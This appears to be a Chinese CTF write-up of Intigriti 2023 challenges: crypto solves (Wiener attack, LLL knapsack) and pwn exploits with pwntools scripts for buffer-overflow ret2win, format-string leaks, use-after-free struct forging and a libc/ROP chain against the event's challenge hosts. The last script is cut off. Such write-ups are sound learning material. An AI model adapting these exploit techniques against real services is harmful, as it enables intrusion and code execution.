[intigriti 2023] 部分题

国外的小比赛,只做了其中一部分题目。

crypto

ReallySecureApparently

只给了n,e和一个文件,猜文件内容是密文c;e几乎和n一样长,这通常意味着私钥指数d很小,猜是Wiener攻击。

n = 689061037339483636851744871564868379980061151991904073814057216873412583484720768694905841053416938972235588548525570270575285633894975913717130070544407480547826227398039831409929129742007101671851757453656032161443946817685708282221883187089692065998793742064551244403369599965441075497085384181772038720949 
e = 98161001623245946455371459972270637048947096740867123960987426843075734419854169415217693040603943985614577854750928453684840929755254248201161248375350238628917413291201125030514500977409961838501076015838508082749034318410808298025858181711613372870289482890074072555265382600388541381732534018133370862587

#c = bytes_to_long(open('ciphertext','rb').read())
c = 441001510077083440712098978980133930415086107290453312932779721137710693129669898774537962879522006041519477907847531444975796042514212299155087533072902229706427765901890350700252954929903001909850453303487994374982644931473474420223319182460327997419996588889034403777436157228265528747769729921745312710652
from Crypto.Util.number import long_to_bytes,bytes_to_long
def transform(x,y):
    """Return the continued-fraction partial quotients of x/y.

    Runs the Euclidean algorithm on (x, y) and records each integer
    quotient in order.  A zero ``y`` yields an empty list.
    """
    quotients = []
    while y:
        q, r = divmod(x, y)
        quotients.append(q)
        x, y = y, r
    return quotients

def continued_fraction(res):
    """Fold a list of partial quotients back into a single fraction.

    The list is consumed from its last term to its first.  Returns the pair
    (numerator, denominator); an empty list gives (1, 0).
    """
    top, bottom = 1, 0
    for term in reversed(res):
        top, bottom = term * top + bottom, top
    return top, bottom

def wiener_attack(c,res,n):
    """Try each convergent denominator as a candidate private exponent.

    ``res`` is a list of partial quotients (the caller passes those of e/n).
    Every proper prefix is folded into a convergent, its denominator is used
    as d to decrypt ``c`` modulo ``n``, and any result containing both braces
    is printed.  Nothing is returned.

    This only works when d is unusually small (Wiener's bound is roughly
    d < n**0.25 / 3); keys generated with a full-size d are not affected.
    """
    print("Attack start...")
    for prefix_len in range(1, len(res)):
        _, candidate_d = continued_fraction(res[:prefix_len])
        plaintext = long_to_bytes(int(pow(c, candidate_d, n)))
        # Cheap plausibility filter: keep plaintexts that contain "{" and "}".
        looks_like_flag = b'{' in plaintext and b'}' in plaintext
        if looks_like_flag:
            print(plaintext)
        
# Expand e/n into partial quotients, then test every convergent against c.
res = transform(e,n)
wiener_attack(c,res,n)

#INTIGRITI{0r_n07_50_53cur3_m4yb3}

Keyless

加密只用了+、*、^(异或)三种运算,步数比一般的题多一点;没有密钥,每一步都可逆,按相反顺序逐步逆运算即可还原。

def encrypt(message):
    """Encode *message* character by character with a fixed, keyless transform.

    Each code point goes through ``*2 +10``, ``^42 +5``, ``*3 -7`` and ``^23``
    in that order and is emitted as one character.  No secret is involved and
    every step can be undone, so this is an encoding rather than encryption.
    """
    def scramble(code_point):
        stage = code_point * 2 + 10
        stage = (stage ^ 42) + 5
        stage = stage * 3 - 7
        return stage ^ 23

    return "".join(chr(scramble(ord(symbol))) for symbol in message)

# Placeholder value; the real flag is redacted in the published source.
flag = "INTIGRITI{REDACTED}"
encrypted_flag = encrypt(flag)

# Text mode with no explicit encoding: the encoded characters are written as
# whatever byte sequences the platform's default encoding produces for them.
with open("flag.txt.enc", "w") as file:
    file.write(encrypted_flag)
# NOTE(review): `enc` is not defined in this listing — presumably the raw bytes of flag.txt.enc.
# Rebuild each code point from a byte pair: 5 payload bits from the first byte
# and 6 from the second, i.e. a two-byte UTF-8 sequence. This assumes every
# encoded character occupies exactly two bytes in the file.
d = [((enc[i]&0x1f)<<6)+(enc[i+1]&0x3f) for i in range(0,len(enc),2)]
# Undo encrypt() in reverse order: ^23, then +7 and //3, then -5, ^42, -10 and //2.
b = [(((((i^23)+7)//3 - 5)^42) - 10)//2 for i in d]
bytes(b)
#INTIGRITI{m4yb3_4_k3y_w0uld_b3_b3773r_4f73r_4ll}

Not So Smooth

a,b未知,但计算f(B,a)时只用到pow(u,a,p),而这个值可以由公开的A和w直接解出,所以不必求出a,b。

from Crypto.Util.number import long_to_bytes
from Crypto.Util.strxor import strxor
from random import randint
from flag import FLAG

def f(x, n):
    """Evaluate u**n * x + v * (1 - u**n) / (1 - u) modulo p.

    This is the closed form of applying x -> u*x + v (mod p) n times.  The
    exponent n enters only through k = pow(u, n, p), and the result is linear
    in x for a fixed k.  Reads the module-level u, v and p.
    """
    k = pow(u, n, p)
    inv_one_minus_u = pow(1 - u, -1, p)
    return (k * x + v * (1 - k) * inv_one_minus_u) % p

p = 97201997431130462639713476119411091922677381239967611061717766639853376871260165905989218335681560177626304205941143288128749532327607316527719299945637260643711897738116821179208534292854942631428531228316344113303402450588666012800739695018334321748049518585617428717505851025279186520225325765864212731597
u = 14011530787746260724685809284106528245188320623672333581950055679051366424425259006994945665868546765648275822501035229606171697373122374288934559593175958252416643298136731105775907857798815936190074350794406666922357841091849449562922724459876362600203284195621546769313749721476449207319566681142955460891977927184371401451946649848065952527323468939007868874410618846898618148752279316070498097254384228565132693552949206926391461108714034141321700284318834819732949544823937032615318011463993204345644038210938407875147446570896826729265366024224612406740371824999201173579640264979086368843819069035017648357042
v = 16560637729264127314502582188855146263038095275553321912067588804088156431664370603746929023264744622682435376065011098909463163865218610904571775751705336266271206718700427773757241393847274601309127403955317959981271158685681135990095066557078560050980575698278958401980987514566688310172721963092100285717921465575782434632190913355536291988686994429739581469633462010143996998589435537178075521590880467628369030177392034117774853431604525531066071844562073814187461299329339694285509725214674761990940902460186665127466202741989052293452290042871514149972640901432877318075354158973805495004367245286709191395753
w = 30714296289538837760400431621661767909419746909959905820574067592409316977551664652203146506867115455464665524418603262821119202980897986798059489126166547078057148348119365709992892615014626003313040730934533283339617856938614948620116906770806796378275546490794161777851252745862081462799572448648587153412425374338967601487603800379070501278705056791472269999767679535887678042527423534392867454254712641029797659150392148648565421400107500607994226410206105774620083214215531253544274444448346065590895353139670885420838370607181375842930315910289979440845957719622069769102831263579510660283634808483329218819353
# Two private exponents. randint comes from the `random` module, which is not a
# cryptographically secure generator.
a = randint(0, 2**2048)
b = randint(0, 2**2048)
# Values derived from the shared starting point w; both are printed below.
A = f(w, a)
B = f(w, b)
# The key is f(B, a) truncated to the flag length and XORed with the flag.
key = long_to_bytes(f(B, a))[:len(FLAG)]
enc = strxor(FLAG, key)
print(f"{A = }")
print(f"{B = }")
print(f"{enc = }")


A = 7393401480034113709683683682039780458211722756040975666277858366986963864147091724359492764726999692812421940595309756560491142512219957986281425163574890752574157617546760386852366936945888357800966704941013951530688031419816817272581287237223765833452303447283089906937413964658335387593899889933721262202
B = 6919381992041136573008188094979879971060160509085428532054694712745921654244468113796582501225839242977870949915769181804595896718922228206397860738237256125972615830799470450058633231003927061049289907097099916321068776956652172887225970642896455423957706532253349472544176183473470843719479781727784095989
enc = b'\xcfW\x85\x8d\xedU\xdd\xd9`\x16f\xb8j(\xeb9-\x1b\xb8\x18 0av\xe5\xabK\xc6'
'''
    k                   k             y
(pow(u,n,p)*x + v*(1-pow(u,n,p))*pow(1-u, -1, p)) % p  
(k*x + v*(1-k)*y) % p
(kx + vy*(1-k)) % p
kx + vy - vyk = k(x-vy)+vy %p 
'''
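# With k = pow(u, n, p) and y = pow(1 - u, -1, p), the challenge's f(x, n)
# equals k*(x - v*y) + v*y (mod p): linear in x once k is known.
y = pow(1 - u, -1, p)
# A = f(w, a) is public, so k1 = pow(u, a, p) follows by solving that linear
# relation for k. The exponent a itself is never needed, which is why the
# scheme gives no secrecy.
k1 = (A - v * y) * pow(w - v * y, -1, p) % p
# Recompute f(B, a) from k1 alone.
fba = (k1 * B + v * (1 - k1) * y) % p
# The original line called an undefined `xor` and discarded the result; strxor
# is the helper the challenge script imports, and both operands have len(enc).
print(strxor(enc, long_to_bytes(fba)[:len(enc)]))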
#INTIGRITI{1e863724be1ea6d3e}

1-10

背包加密

from random import randint
from re import search
from flag import FLAG

# Ten public coefficients, each up to 2**1000.
cs = [randint(0, 2**1000) for _ in range(10)]
# Ten random values up to 2**64 ...
xs = [randint(0, 2**64) for _ in range(10)]
# ... each rounded down to a multiple of 1000 and then offset by one character
# of the text between the braces of FLAG, so x % 1000 is that character's code
# (for codes below 1000). zip() stops at the shorter of the two sequences.
xs = [ord(f) + i - (i%1000)  for i, f in zip(xs, search("{(.*)}", FLAG).group(1))]

# Only the coefficients and the weighted sum are published.
print(f"{cs = }")
print(f"s = {sum(c*x for c, x in zip(cs, xs))}")

cs = [8508903290440008966939565321248693758153261635170177499193552423579929500027826696702216711413627480472568726828904707392607240309148374882044455682656477650413559779578913981575195542381602155806438946382809049847521263107908111429547314575039079118614485792613461747911710760754291582134293099750060, 10234293217173095983648586990138462404689872504690765936890158736280331352728086141006820545673419953576281340699793983414878095413526583845311613647542879798224462254801103246845064675391113534349390649562211376117941776588135441368773636568930887968431002105334751994385414474789708434897717472259757, 6001064586644974650131784742218587067958465984737568290249286706923485137083921908971767187010824715217158349948368322929900720010489749231105336650564421771867089333709608235963711368415685056362117910529113580811922176651335662802405504434103542105450330213217418470901029864459362153866361049469621, 5859510800336462649673113647904370677448984650623412649303149431740483580968255760095323745895405406649271411277663981671465673293279417168147656423009231087547991428322779036740050269460373254323377738756038706795196225547099530503996157675637620918729310987613041873955654973230573780794437230183289, 8212120161226957435594246142362544687871307206030517377713172267061914524817671684448986080347503212333314134144272096534190656954277299391948626024244379808998220515649968150824587976113971840005858079163744362874678111323034234960076591622752217194796532407435861854992608669653483268713825154541681, 4292538496747452556903766205458518557016170261915268175117554973221631407580344459540989898488936014316805799620957521118332103032738032797936315597220903773140347787977387271254963436603728977128756213671653297994336981775219965231686927050793105808729293803455246360077380768093287937551667515822737, 
8583458084429417950887051233123781099671792568724013361916924355046040863544385972858215904752358387759143712618915109914726815547284050405347634520790328222420443989299783668017365846692013464579110450651166600940834254189911732107856656458621485902792541383514622551498513045029193930072821693821256, 927938350277846540058170699346614173130036388369329189433895716040551556863284640834396837739290832786836335265440745786025530973467859153202044442045287145528583412999497854136387626360287750242048999254798532603013016406637079389023297629455299864761196574249382738851682248453939600976884575974199, 4606866838328488359534883828872534448488908284003992208192170511899852596906485417934690617926601159129473558885893097400239110669875450476234618534668886892219546199419412794765402627731086862572263105282498567494065303352715044800789544479262215220148659740517187562922289802434925672447697743660640, 5696622808956926263797513675882969816326582766528835713485415099018508834817057303528828064039948371652175876967703746446602159940653502950606513683435185458750394450192106019388424601807240033502531431423705043713657847236861816929000927218441444067742560786753091009546483807078198791541719979069795]
s = 605466527953516222016485516214431809590993588699320208021845670703468281059947406248463347211427615855012720451029976981068579151311047123161756448068506197424807516350675172131826275005312472029312861168498961728971558322943730466676859739724928104907194812943584226111451426124864722285484117269190235012612078303171378
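# Sage session. Basis rows are [e_i | cs[i]] for i in 0..9 plus a final row
# [0 ... 0 | -s]; the combination sum(xs[i] * row_i) + last_row is (xs, 0),
# which is short because the xs stay below 2**64 while the cs reach 2**1000.
M = matrix(ZZ, 11, 11)
for i in range(10):
    M[i, -1] = cs[i]
    M[i, i] = 1

M[-1, -1] = -s
v = M.LLL()[0]
# Fix: reduce each coordinate (the original wrote `v%1000`, applying the
# modulus to the whole vector and leaving the loop variable unused).
# NOTE(review): LLL may return the vector negated; if so the residues are not
# character codes and v should be negated first.
print(bytes([i % 1000 for i in v[:-1]]))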
#3a8a32c7f6
#INTIGRITI{3a8a32c7f6}

PWN

hidden

程序开启了PIE,但read可以溢出到返回地址:只改写返回地址的最低一字节,就能让函数返回后重新走到输入流程,同时puts会把没有被\0截断的返回地址一并打印出来,从而得到加载基址。第二次输入时再溢出一次,把返回地址改成后门函数。

// Decompiler output for the routine that reads one message and echoes it back.
// NOTE(review): buf starts at rbp-0x40, but read() below accepts 0x50 bytes, so the
// last 0x10 bytes of a full-length input land on the saved rbp and the return address.
__int64 input()
{
  __int64 buf[6]; // [rsp+0h] [rbp-40h] BYREF
  __int16 v2; // [rsp+30h] [rbp-10h]

  memset(buf, 0, sizeof(buf));
  v2 = 0;
  puts("Tell me something:");
  // The length is the constant 0x50 rather than sizeof(buf), which is 48 bytes.
  read(0, buf, 0x50uLL);
  printf("I remember what you said: ");
  // read() adds no terminator, so puts() keeps printing whatever follows the input on the stack.
  puts((const char *)buf);
  return 0LL;
}
from pwn import *

#p = process('./hidden')
p = remote('hidden.ctf.intigriti.io', 1337)
context(arch='amd64', log_level='debug')

# 0x48 filler bytes span the 0x40 bytes up to rbp plus the 8-byte saved rbp; the one
# extra byte replaces only the lowest byte of the saved return address.
p.sendafter(b"Tell me something:\n", b'A'*0x48+p8(0x59))
p.recvuntil(b'A'*0x48)

# The echoed line runs on past the filler into the return address; its 6 bytes are read
# back and the offset 0x1359 subtracted to get the load base. 0x1359 and 0x11D9 are
# offsets inside this binary that the page does not show.
elf_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x1359
backdoor = elf_base + 0x11D9

# Second pass through the same prompt, this time replacing the whole return address.
p.sendafter(b"Tell me something:\n", b'A'*0x48+p64(backdoor))

p.interactive()
#INTIGRITI{h1dd3n_r3T2W1n_G00_BrrRR}

Floor Mat Store

选6时flag会被fgets读进栈上的缓冲区,并且栈上留有指向它的指针(v8 = v11);随后的printf(format)把用户输入直接当作格式串,存在格式化字符串漏洞,用%10$s就能直接打印出flag。修复方法是改成printf("%s", format)。

  s[0] = "1. Cozy Carpet Mat - $10";
  s[1] = "2. Wooden Plank Mat - $15";
  s[2] = "3. Fuzzy Shag Mat - $20";
  s[3] = "4. Rubberized Mat - $12";
  s[4] = "5. Luxury Velvet Mat - $25";
  s[5] = "6. Mysterious Flag Mat - $1337";
  v8 = v11;
  rgid = getegid();
  setresgid(rgid, rgid, rgid);
  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts("You have a flag.txt, right??");
    exit(0);
  }
  puts(
    "Welcome to the Floor Mat store! It's kind of like heaven.. for mats.\n"
    "\n"
    "Please choose from our currently available floor mats\n"
    "\n"
    "Note: Out of stock items have been temporarily delisted\n");
  puts("Please select a floor mat:\n");
  for ( i = 0; i <= 4; ++i )
    puts(s[i]);
  puts("\nEnter your choice:");
  __isoc99_scanf("%d", &v4);
  if ( v4 <= 0 || v4 > 6 )
  {
    puts("Invalid choice!\n");
    exit(1);
  }
  v7 = v4 - 1;
  while ( getchar() != 10 )
    ;
  if ( v7 == 5 )
    fgets(v11, 64, stream);
  puts("\nPlease enter your shipping address:");
  fgets(format, 128, stdin);
  puts("\nYour floor mat will be shipped to:\n");
  printf(format);
  return 0;
}

┌──(kali㉿kali)-[~/ctf/1118]
└─$ nc floormats.ctf.intigriti.io 1337
Welcome to the Floor Mat store! It's kind of like heaven.. for mats.

Please choose from our currently available floor mats

Note: Out of stock items have been temporarily delisted

Please select a floor mat:

1. Cozy Carpet Mat - $10
2. Wooden Plank Mat - $15
3. Fuzzy Shag Mat - $20
4. Rubberized Mat - $12
5. Luxury Velvet Mat - $25

Enter your choice:
6

Please enter your shipping address:
%10$s

Your floor mat will be shipped to:

INTIGRITI{50_7h475_why_7h3y_w4rn_4b0u7_pr1n7f}

Maltigriti

题目给了很长的源码:logout里free(user->bio)之后没有把指针清空,存在UAF;另外程序里还留了后门(余额不少于1337时buy_swag_pack直接输出flag)。

// pwn/maltigriti
// by c0nrad - Sloppy Joe Pirates
// Enjoy <3

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// One-byte status codes compared against Report.status.
const char STATUS_ACCEPTED = 'A';
const char STATUS_REJECTED = 'R';
const char STATUS_DUPLICATE = 'D';

// Account record; allocated with malloc() in register_user().
struct User {
    char name[32];
    char password[32];
    int bio_length;   // size the user entered; passed to malloc() and fgets() for bio
    char *bio;        // heap buffer; logout() frees it but leaves this pointer in place
};

// One bug report; reports form a singly linked list through next.
struct Report {
    struct User *user;    // submitter; compared by pointer in calculate_balance()
    char status;          // one of the STATUS_* codes
    long bounty;          // summed by calculate_balance() when status is accepted
    char title[32];
    char body[128];
    struct Report *next;  // NOTE(review): never assigned in new_report()
};

// Print every report in the list, numbered from 1, with its title, body,
// status label and bounty.
void print_reports(struct Report *report) {
    int shown = 0;

    for (struct Report *cur = report; cur != NULL; cur = cur->next) {
        shown++;
        printf("--- Report #%d ---\n", shown);
        printf("Title: %s\n", cur->title);
        printf("Body: %s\n", cur->body);

        // Any status byte other than the three known codes prints as Unknown.
        char state = cur->status;
        if (state == STATUS_ACCEPTED)
            printf("Status: Accepted\n");
        else if (state == STATUS_REJECTED)
            printf("Status: Rejected\n");
        else if (state == STATUS_DUPLICATE)
            printf("Status: Duplicate\n");
        else
            printf("Status: Unknown\n");

        printf("Bounty: %ld\n", cur->bounty);
    }
}

// Apply the same buffering mode to the three standard streams.
// The mode is passed as the literal 2, which is the value glibc assigns to
// _IONBF (unbuffered) — confirm for the target libc.
void setup() {
    FILE *streams[] = { stdin, stdout, stderr };

    for (size_t i = 0; i < sizeof streams / sizeof streams[0]; i++)
        setvbuf(streams[i], NULL, 2, 0);
}

// Print the banner and the eight menu entries, then the prompt (no newline).
void menu() {
    static const char *const entries[] = {
        "\n\n--- Welcome to maltigriti's bug bounty reporting system! ---",
        "0. Register User",
        "1. Edit User",
        "2. Submit a bug report",
        "3. Print Reports",
        "4. Print Balance",
        "5. Buy Swag Pack",
        "6. Logout",
        "7. Exit",
    };

    for (size_t i = 0; i < sizeof entries / sizeof entries[0]; i++)
        puts(entries[i]);
    printf("menu> ");
}

// Show and replace the bio of an existing user, or allocate one on first use.
// NOTE(review): the else branch also runs when user is NULL (menu option 1 before
// registering) and dereferences it; that case needs its own guard.
void edit_user(struct User *user) {
    if (user != 0 && user->bio != NULL) {
        // Prints and then overwrites whatever bio points at. logout() frees that buffer
        // without clearing the pointer, so after a logout this reads and writes freed memory.
        printf("Your current bio is: %s\n", user->bio);   //leak
        printf("Enter your new bio> ");
        fgets(user->bio, user->bio_length, stdin);
    } else {
        puts("You don't have a bio yet!");
        printf("How long is your bio> ");

        // The length comes straight from the user and is not range-checked;
        // the malloc() result below is not checked either.
        scanf("%d", &user->bio_length);
        getchar();

        user->bio = malloc(user->bio_length);
        printf("Enter your new bio> ");

        fgets(user->bio, user->bio_length, stdin);
    }
}

// Wipe the user's name, password and bio contents, then release the bio buffer.
// NOTE(review): user->bio and user->bio_length are left as they were after free(), and
// the caller keeps the User, so a later edit_user() still reaches the freed buffer
// (use-after-free) and a second logout() frees it again. Setting user->bio = NULL and
// user->bio_length = 0 right after free() closes both paths.
// NOTE(review): user->bio is passed to memset() without a NULL check.
void logout(struct User *user) {
    if (user != NULL) {
        memset(user->name, 0, 32);
        memset(user->password, 0, 32);
        memset(user->bio, 0, user->bio_length);
        free(user->bio);
    }
}

// Sum the bounties of accepted reports whose user pointer equals `user`,
// print the total and return it.
// Ownership is decided by pointer comparison only, and the long bounty is
// accumulated into an int.
int calculate_balance(struct Report *report, struct User *user) {
    int balance = 0;

    for (struct Report *cur = report; cur != NULL; cur = cur->next) {
        if (cur->status != STATUS_ACCEPTED || cur->user != user)
            continue;
        balance += cur->bounty;
    }

    printf("Your balance is: %d\n", balance);
    return balance;
}

// Print the swag pack line and exit when the user's balance is at least 1337;
// otherwise print the refusal messages and return.
void buy_swag_pack(struct Report *report, struct User *user) {
    if (calculate_balance(report, user) < 1337) {
        puts("You don't have enough money to buy a swag pack!");
        puts("Keep submitting bug reports and maybe you'll get there one day!");
        puts(":evil_grin:");
        return;
    }

    puts("You have enough money to buy a swag pack!");
    puts("With great swag comes great responsibility.");
    puts("Here is your swag pack: flag{redacted_redacted}");
    exit(0);
}

// Allocate a User, read its name and password, then hand it to edit_user()
// to set up the bio. Returns the new record.
// NOTE(review): malloc() does not initialise bio or bio_length, yet edit_user()
// tests user->bio straight away; calloc() or explicit zeroing would make that
// test well-defined. The malloc() result is not checked.
struct User *register_user() {
    struct User *account = malloc(sizeof *account);

    printf("Enter your name> ");
    fgets(account->name, sizeof account->name, stdin);

    printf("Enter your password> ");
    fgets(account->password, sizeof account->password, stdin);

    edit_user(account);
    return account;
}

// Allocate a report, link it at the tail of the list (or start the list),
// read its title and body, and mark it as a zero-bounty duplicate.
// Returns the head of the list.
// NOTE(review): the new node's next field is never assigned, so the tail walk
// relies on whatever the allocator left in that memory.
struct Report *new_report(struct Report *firstReport, struct User *user) {
    struct Report *fresh = malloc(sizeof *fresh);

    if (firstReport == NULL) {
        firstReport = fresh;
    } else {
        struct Report *tail = firstReport;
        while (tail->next != NULL)
            tail = tail->next;
        tail->next = fresh;
    }

    fresh->user = user;

    printf("Enter your report title> ");
    fgets(fresh->title, sizeof fresh->title, stdin);

    printf("Please enter the content of your report> ");
    fgets(fresh->body, sizeof fresh->body, stdin);

    // Every submission is closed as a duplicate with no bounty.
    fresh->status = STATUS_DUPLICATE;
    fresh->bounty = 0;

    puts("Thank you for submitting your bug report!");
    puts("Unfortunately our records indicate that this bug has already been submitted!");
    puts("Report will be closed and marked as duplicate.");
    puts("Hope you didn't spend too much time on it! ( ͡° ͜ʖ ͡°) ");

    return firstReport;
}

// Menu loop: read a number and dispatch to the matching action until exit.
// `user` keeps pointing at the same record across logout(), and registering
// again replaces the pointer without freeing the previous record.
int main() {
    struct Report *reports = 0;
    struct User *user = 0;
    int report_count = 0;  // not used below
    int menu_choice = 0;

    setup();
    for (;;) {
        menu();
        scanf("%d", &menu_choice);
        getchar();

        switch (menu_choice) {
        case 0:
            user = register_user();
            break;
        case 1:
            edit_user(user);
            break;
        case 2:
            reports = new_report(reports, user);
            break;
        case 3:
            print_reports(reports);
            break;
        case 4:
            calculate_balance(reports, user);
            break;
        case 5:
            buy_swag_pack(reports, user);
            break;
        case 6:
            logout(user);
            break;
        case 7:
            exit(0);
            break;
        default:
            puts("Invalid choice!");
            break;
        }
    }
}
from pwn import *

# Connection to the challenge service (the local-process variant is commented out).
#p = process('./maltigriti')
p = remote('maltigriti.ctf.intigriti.io', 1337)
context(arch='amd64', log_level='debug')

def add_user():
    """Pick menu option 0 and answer the name and password prompts."""
    p.sendlineafter(b"menu> ", b'0')
    p.sendlineafter(b"Enter your name> ", b'AAA')
    p.sendlineafter(b"Enter your password> ", b'AAA')

def add_bio(bio):
   """Answer the bio-length prompt with 0xc8 and then send *bio*."""
   # 0xc8 is presumably chosen so the bio allocation falls in the same allocator
   # size class as a struct Report — confirm against the target libc.
   p.sendlineafter(b"How long is your bio> ", str(0xc8).encode())  #bio == report
   p.sendlineafter(b"Enter your new bio> ", bio)

def edit_user():
   """Pick menu option 1, read the printed bio and send a replacement.

   The reply packs the value just read, the byte b'A' padded to eight bytes
   and the 32-bit value 2337. That layout matches the first three fields of
   the challenge's struct Report (user pointer, status, bounty), on the
   assumption that the freed bio buffer now backs a Report.
   """
   p.sendlineafter(b"menu> ", b'1')
   p.recvuntil(b"Your current bio is: ")
   ptr = u64(p.recvline()[:-1].ljust(8,b'\x00'))
   p.sendlineafter(b"Enter your new bio> ", p64(ptr)+ b'A'+ b'\x00'*7 + p32(2337))

def free_user():
    """Pick menu option 6 (logout), which frees the bio buffer on the server."""
    p.sendlineafter(b"menu> ", b'6')

def add_report():
    """Pick menu option 2 and submit a report with a one-byte title and body."""
    p.sendlineafter(b"menu> ", b'2')
    p.sendlineafter(b"Enter your report title> ", b'A')
    p.sendlineafter(b"Please enter the content of your report> ", b'A')

def door():
    """Pick menu option 5 (buy swag pack), which prints the flag when the balance is at least 1337."""
    p.sendlineafter(b"menu> ", b'5')

# Register with a bio, log out (the bio is freed but its pointer is kept), then
# submit a report so that a Report is allocated while that stale pointer exists.
add_user()
add_bio(b'A')
free_user()
add_report()

# Editing the "bio" now goes through the stale pointer; then request the swag pack.
edit_user()
door()
#gdb.attach(p)
#pause()

p.interactive()
#INTIGRITI{u53_4f73r_fr33_50und5_600d_70_m3}

Over The Edge

头一回见Python的pwn题。要求输入一个整数,程序用numpy的uint64(定长的无符号64位整数)保存它,所以用0减去它时同样会发生回绕(整数溢出)。

import numpy as np
import warnings
import socket, sys
import threading

# Silence RuntimeWarning and DeprecationWarning for the whole process.
# NOTE(review): NumPy reports integer wrap-around in scalar arithmetic as a
# RuntimeWarning, so this presumably hides the overflow in process_input() — confirm.
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)

def process_input(input_value):
    """Return the reply string for one submitted integer.

    Negative input gives "Exiting...".  Otherwise ``input_value + 65`` is
    stored in a uint64 and subtracted from a uint64 zero; because the
    arithmetic is fixed-width and unsigned, the difference wraps modulo 2**64
    instead of going negative, so it can equal 1337 for a large enough input.
    """
    if input_value < 0:
        return "Exiting..."

    minuend = np.zeros(1, dtype=np.uint64)
    subtrahend = np.zeros(1, dtype=np.uint64)
    subtrahend[0] = input_value + 65

    difference = minuend[0] - subtrahend[0]
    if difference == 1337:
        return 'You won!\n'
    return 'Try again.\n'

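def handle_client(client_socket, client_address):
    """Serve one client until it wins, disconnects or sends bad input.

    Each received chunk is parsed as a decimal integer and passed to
    process_input(); the winning reply is replaced by the contents of the
    local "flag" file.  Any error ends the session and is logged on the
    server side; the socket is always closed on the way out.
    """
    try:
        print(f"Accepted connection from {client_address}")
        client_socket.send(b"Time to jump over the edge!\n")
        client_socket.send(b"")

        while True:
            input_data = client_socket.recv(1024).decode().strip()
            if not input_data:
                break
            # int() raises ValueError on non-numeric input; handled below.
            response = process_input(int(input_data))
            if response == 'You won!\n':
                with open("flag", "r") as flag_file:
                    client_socket.send(flag_file.read().encode())
                break
            client_socket.send(response.encode())

        print(f"Connection from {client_address} closed")
    except Exception as exc:
        # Previously a bare ``except:`` that hid every failure (and also caught
        # SystemExit/KeyboardInterrupt); record why the session ended instead.
        print(f"Connection from {client_address} dropped: {exc!r}")
    finally:
        # Single close path for success, win and error alike.
        client_socket.close()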

def main():
    """Listen on every interface, port 1337, and serve each connection on its own thread."""
    host = '0.0.0.0'
    port = 1337

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, port))
    listener.listen()

    print(f"Listening on {host}:{port}")

    # One thread per accepted connection; there is no cap on concurrent clients.
    while True:
        connection, peer = listener.accept()
        worker = threading.Thread(target=handle_client, args=(connection, peer))
        worker.start()

if __name__ == "__main__":
    main()
┌──(kali㉿kali)-[~/ctf/1118]
└─$ nc edge2.ctf.intigriti.io 1337
Time to jump over the edge!
18446744073709550214
INTIGRITI{fUn_w1th_1nt3g3r_0v3rfl0w_11}                                                                                                                                                                                                    

Reading in the Dark

要求输入特定格式的串(以|分隔),而且输入内容会被printf当作格式串输出,因此可以泄露出需要的地址(canary、栈地址、程序基址、libc地址);然后在程序给出的时间上做一次整型溢出(加上0x100000000)通过时间戳校验进入admin_read,再溢出写入ROP链。

// Decompiler output for the request loop: read a line, validate its framing, then
// dispatch on the function number returned by parse_function().
//   1 -> print the server's current time (no timestamp check)
//   2 -> echo(a1)            after validate_timestamp()
//   3 -> read_in_the_dark()  after validate_timestamp()
//   4 -> admin_read(a1)      after validate_timestamp()
// Other values fall through and the loop prompts again.
void __fastcall __noreturn menu(char *a1)
{
  unsigned int current_time; // eax
  int v2; // [rsp+1Ch] [rbp-24h]

  while ( 1 )
  {
    while ( 1 )
    {
      do
      {
        while ( 1 )
        {
          printf("> ");
          fgets(a1, 256, stdin);
          if ( !validate_data(a1) )             // four '|' characters, and the line starts and ends with '|'
          {
            puts("Invalid data...");
            exit(1);
          }
          v2 = parse_function(a1);
          if ( v2 != 4 )
            break;
          if ( !(unsigned __int8)validate_timestamp(a1) )
            goto LABEL_18;
          admin_read(a1);
        }
      }
      while ( v2 > 4 );
      if ( v2 != 3 )
        break;
      if ( (unsigned __int8)validate_timestamp(a1) )
        read_in_the_dark();
      else
LABEL_18:
        puts("Invalid Timestamp.");
    }
    if ( v2 == 1 )
    {
      // Function 1 needs no timestamp and discloses the clock value that the
      // timestamp check on the other functions is presumably compared against.
      current_time = get_current_time();
      fprintf(_bss_start, "%d\n", current_time);
    }
    else if ( v2 == 2 )
    {
      if ( !(unsigned __int8)validate_timestamp(a1) )
        goto LABEL_18;
      echo(a1);
    }
  }
}
#from ctypes import *
from pwn import *

#clibc = cdll.LoadLibrary("./libc.so.6")
context(arch='amd64', log_level='debug')

# Local copies of the binary and of the libc build, used to resolve symbols.
elf = ELF('./ritd')
libc = ELF('./libc6_2.35-0ubuntu3.1_amd64.so')

#p = process('./ritd')
p = remote('ritd.ctf.intigriti.io', 1337)

#gdb.attach(p, "b*0x555555555892\nc")


# Function 1: ask the service for its current time.
pay = b'|1|1||'
p.sendlineafter(b">", pay)
p.recvline()
# 2**32 is added to the reported time; presumably the timestamp check only looks
# at the low 32 bits — confirm against validate_timestamp, which is not shown.
v = int(p.recvline()) + 0x100000000

#v = clibc.time(0)
# Function 4 with four positional %p conversions in the data field.
pay = f'|{v:10d}|4%75$p,%76$p,%77$p,%143$p,||' #{clibc.time(0):10d}
print(pay)
p.sendlineafter(b">", pay)

# Parse the four printed values in order; per the stack dump after this script they
# are the canary, a saved frame pointer, a return address inside menu and a return
# address inside __libc_start_main. The constants subtracted are specific to this
# binary and this libc build.
p.recvuntil(b'4')
canary = int(p.recvuntil(b',', drop=True),16)
stack  = int(p.recvuntil(b',', drop=True),16) - 0x50
elf.address = int(p.recvuntil(b',', drop=True),16) - 0x1a45
libc.address = int(p.recvuntil(b',', drop=True),16) - 128 - libc.sym['__libc_start_main']
print(f"{canary = :x} {stack = :x} {elf.address = :x} {libc.address = :x}")

pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
bin_sh = next(libc.search(b'/bin/sh\x00'))
leave_ret = elf.address + 0x17c2

# Answer the three admin_read prompts: an address, a byte value, then the final
# payload, which carries the leaked canary so the stack check still passes.
p.sendlineafter(b"In order to read, you must write. Where would you like to write? (give hex address without 0x)\n", f"{stack:x}".encode())
p.sendlineafter(b"Now what byte would u like to write there?\n", b'0')
